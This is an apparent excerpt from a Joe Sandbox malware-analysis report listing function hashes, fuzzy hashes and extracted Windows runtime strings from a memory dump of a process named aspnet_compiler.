                                                    • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                    • Instruction ID: 565991f5a84cc811990774e0501e5789307d9e90659fd9da6ded81411b8385b5
                                                    • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                    • Instruction Fuzzy Hash: 92818D70E052499EEF258F6CC8527EEBBE1AF45BA0F18429DD8D1A7291C7389841CF51
                                                    Strings
                                                    • RTL: Resource at %p, xrefs: 010F7B8E
                                                    • RTL: Re-Waiting, xrefs: 010F7BAC
                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 010F7B7F
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                    • API String ID: 0-871070163
                                                    • Opcode ID: caeff3ed2909aff43a3e8109ce504836a8e89d4bf38e672992f31188647ddbab
                                                    • Instruction ID: ee38f48ee75ca746dff0801b9ca22ad25d9d87a5bcc66931b0bc15924dba093f
                                                    • Opcode Fuzzy Hash: caeff3ed2909aff43a3e8109ce504836a8e89d4bf38e672992f31188647ddbab
                                                    • Instruction Fuzzy Hash: B04103317047038FD725DE29C881BAAB7E5EF89710F000A5DEAD6DB680DB72E405CB92
                                                    APIs
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 010F728C
                                                    Strings
                                                    • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 010F7294
                                                    • RTL: Resource at %p, xrefs: 010F72A3
                                                    • RTL: Re-Waiting, xrefs: 010F72C1
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                    • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                    • API String ID: 885266447-605551621
                                                    • Opcode ID: 225126f494d391e02521fdfbff1176ce8bfee734009b8b854aa6451e67513aab
                                                    • Instruction ID: 6b34566efaf609cbc033f023429df6feb55d21bcc59cf065ac6474823284b63f
                                                    • Opcode Fuzzy Hash: 225126f494d391e02521fdfbff1176ce8bfee734009b8b854aa6451e67513aab
                                                    • Instruction Fuzzy Hash: 6841F035600203ABD765DE29CC82FAAB7E5FB54710F10461DFAD5AB680DB21E8028BD2
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID: __aulldvrm
                                                    • String ID: +$-
                                                    • API String ID: 1302938615-2137968064
                                                    • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                    • Instruction ID: 9eac759cf03cbab8174b35a091a4dda483e5895753ba152793a1bf840550f1b3
                                                    • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                    • Instruction Fuzzy Hash: 62919071E0021A9BEB64DF6DC8816BEBBF5BF44B20F24855EE995E72C0D73099428F11
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $$@
                                                    • API String ID: 0-1194432280
                                                    • Opcode ID: 102bd670b72ce75debb7bb90ec0b55459026eadf33aefb69c74784d0b5d9779e
                                                    • Instruction ID: 081af244bdf6d8a74a0b9bab43b3cf8218a517e85957d7b716512119dbf3156f
                                                    • Opcode Fuzzy Hash: 102bd670b72ce75debb7bb90ec0b55459026eadf33aefb69c74784d0b5d9779e
                                                    • Instruction Fuzzy Hash: CA812A72D042699FDB35DB54CC44BEEBBB8AB48754F0041EAEA59B7240D7309E84CFA0